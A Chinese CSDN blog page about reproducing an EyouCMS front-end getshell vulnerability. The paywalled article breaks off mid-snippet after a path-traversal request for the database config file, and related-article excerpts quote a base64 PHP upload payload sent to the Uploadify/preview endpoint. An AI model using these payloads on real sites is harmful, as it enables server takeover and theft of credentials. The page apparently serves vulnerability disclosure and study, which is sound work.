EyouCMS V. 前台getshell漏洞复现

最新推荐文章于 2023-12-29 21:29:15 发布
最新推荐文章于 2023-12-29 21:29:15 发布
阅读量878 收藏
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/UgzWeb/article/details/133327134
版权
安全 专栏收录该内容
47 篇文章 2 订阅 ¥59.90 ¥99.00
订阅专栏

漏洞描述:
EyouCMS是一款常用的开源内容管理系统,但在某个版本中存在一个前台getshell漏洞。该漏洞允许攻击者通过构造恶意请求,在未经授权的情况下执行任意代码,从而获取服务器的控制权。

漏洞复现步骤:
为了演示该漏洞的复现过程,我们将使用以下代码示例。请注意,这只是一个演示,为了安全考虑,请勿在真实环境中尝试这些操作。

  1. 环境搭建:
    为了复现漏洞,我们需要搭建一个包含漏洞版本的EyouCMS环境。你可以在本地使用虚拟机或者使用在线的演示环境。

  2. 构造恶意请求:
    攻击者可以构造一个特定的恶意请求,以利用该漏洞。以下是一个示例的恶意请求:

    <?php
$url = 'http://target-website.com/index.php?m=api&c=ajax&a=downfile&path=/../config/database.php';
$result = file_get_contents
了解本专栏 订阅专栏 解锁全文
UgzWeb
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
EyouCms1.0前台GetShell漏洞复现
weixin_44897902的博客
12-08 3398
漏洞名称: EyouCms1.0前台GetShell 漏洞影响: EyouCms1.0 复现过程: url/index.php/api/Uploadify/preview 若出现: 则说明存在漏洞 <?php phpinfo(); 通过post数据: data:image/php;base64,PD9waHAgcGhwaW5mbygpOw== 页面返回: 访问:url/p...
PHPCMS v9本地文件包含漏洞Getshell
fansenliangren的博客
12-01 1450
文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果......
eyoucms 1.5.5任意命令执行漏洞(0day)
羽的博客
12-30 7850
eyoucms 1.5.5任意命令执行漏洞 文章目录eyoucms 1.5.5任意命令执行漏洞一、漏洞简介二、漏洞影响三、复现过程漏洞位置漏洞分析漏洞利用 一、漏洞简介 eyoucms1.5.5后台存在任意命令执行漏洞。 二、漏洞影响 eyoucms1.5.5 三、复现过程 漏洞位置 application\admin\logic\FilemanagerLogic.php editFile函数。 漏洞分析 当我们在模板管理功能的页面中传入php代码时会被解析。但是存在过滤,过滤如下: $content =
Eyoucms SSTI漏洞-2019年老文
J0o1ey Blog
05-16 1081
### 0x01 审计起因 由于在先知查看文章的时候无意看到了EyouCMS漏洞复现文章,于是产生了审计之心 0x02 EyouCMS简介 EyouCms是基于TP5.0框架为核心开发的免费+开源的企业内容管理系统,专注企业建站用户需求。提供海量各行业模板,降低中小企业网站建设、网络营销成本,致力于打造用户舒适的建站体验。这是一套安全、简洁、免费的流行CMS,包含完整后台管理、前台展示,直接下载安装即可使用。 演示网址:http://demo.eyoucms.com 官方网站:http://ww
EyouCMSv1.5.1漏洞复现
m0_69801663的博客
12-29 2391
EyouCMSv1.5.1漏洞复现
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
漏洞简介:易优cms企业建站系统是由php+mysql开发的一套专门用于中小企业网站建设的开源cms。可以用来快速建设一个企业网站( PC,手机,微信都可以访问
eyoucms 前台 getshell 复现
andiao1218的博客
08-31 1634
漏洞地址:http://www.sch01ar.com/index.php/api/Uploadify/preview 这样子说明存在漏洞 对 <?php phpinfo(); 进行 base64 编码 构造: data:image/php;base64,PD9waHAgcGhwaW5mbygpOyA= 通过 post 方式发生数据 返回了结果地址,访问一下...
eyoucms 1.4.6 XSS vulnerability
qq_42560798的博客
10-13 351
eyoucms 1.4.6 XSS vulnerabilityVulnerability describes Vulnerability describes Vulnerability found in Eyoucms1.4.6 and prior releases. In the member center member contribution office, after editing the contribution content through the editor, intercept the
Ares-X#VulWiki#(CVE-2018-14961)Zzcms 8.3 前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
最新发布
04-08
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
jboss漏洞getshell工具.zip
08-26
jboss漏洞getshell工具
代码审计之youdiancms最新版getshell漏洞1
08-03
代码审计之youdiancms最新版getshell漏洞 本文将对youdiancms最新版getshell漏洞进行代码审计,详细讲解漏洞的发现和利用过程。 SQL注入漏洞 第一步,我们拿到源码,发现该系统是基于THINKPHP3开发的。在App/Lib/...
cms后台利用更新模块压缩包getshell
黑面狐
09-07 991
最近在找文件上传漏洞比较多。现在发现比较难找了,一是文件校验比前几年的更加严格了,黑名单还可以想办法绕过,白名单就相对困难了。 最近发现一个getshell的方法,原理是利用文件更新上传带有shell的压缩包。 https://github.com/idreamsoft/iCMS/issues/41 参考这个漏洞。在更新的时候上传有shell的压缩包,因为没有对压缩包进行校验,所以直接解压成...
易优cms后台RCE以及任意文件上传漏洞
weixin_30415113的博客
07-31 3592
前言 EyouCms是基于TP5.0框架为核心开发的免费+开源的企业内容管理系统,专注企业建站用户需求提供海量各行业模板,降低中小企业网站建设、网络营销成本,致力于打造用户舒适的建站体验。易优cms v1.3.7后台插件模块存在代码执行漏洞。 正文 Weapp.php文件中的create()方法接收了请求中的参数,过滤后直接存入php配置文件中,但是由于过滤不严,导致可以直接写...
74cms 6.0.20 getshell
m0_51377238的博客
12-16 292
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。http://serverName/index.php/模块/控制器/操作m参数表示模块,c参数表示控制器,a参数表示操作/方法,后面的表示其他GET参数。
微擎后台getshell,低权限也可以
sumubaiblog的博客
07-11 4501
比如编辑专题:/web/index.php?这个文件可以编辑html,然后前台会解析成php。改html内容为php。
易优cms修复验证码不显示的问题
eyoucms的博客
10-20 1011
修复验证码不显示的BUG 已做好更新包,发现有此BUG的朋友可以下载回去直接覆盖对应目录文件即可   下载  :验证码不显示的bug
友点cms9.1 getshell漏洞
05-01
友点CMS9.1是一款国内常用的开源CMS系统,近日被指出存在一个getshell漏洞,该漏洞可允许攻击者通过构造特殊的请求参数向网站注入任意代码,并获取服务器的控制权。 经分析,该漏洞影响范围较广,可影响友点CMS9.1及其以下版本。攻击者通过构造恶意请求的方式,可以在服务器上创建备份文件、写入木马文件等,从而达到控制被攻击网站的目的。 该漏洞的原因主要是由于友点CMS未对输入数据进行充分过滤和校验,允许攻击者通过对请求参数的篡改来实现代码注入攻击。建议用户尽快升级友点CMS至9.1.1版本,该版本已针对此漏洞进行了修复。 在实际应用中,为了防止此类漏洞的发生,建议管理员在搭建网站时采取必要的防护措施,如加强受限访问、设置访问认证、定期检查网站安全漏洞等,以加强网站的安全性和稳定性。同时,用户应该注意及时更新网站软件补丁、适时备份网站数据等措施,确保网站的更好安全保障。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值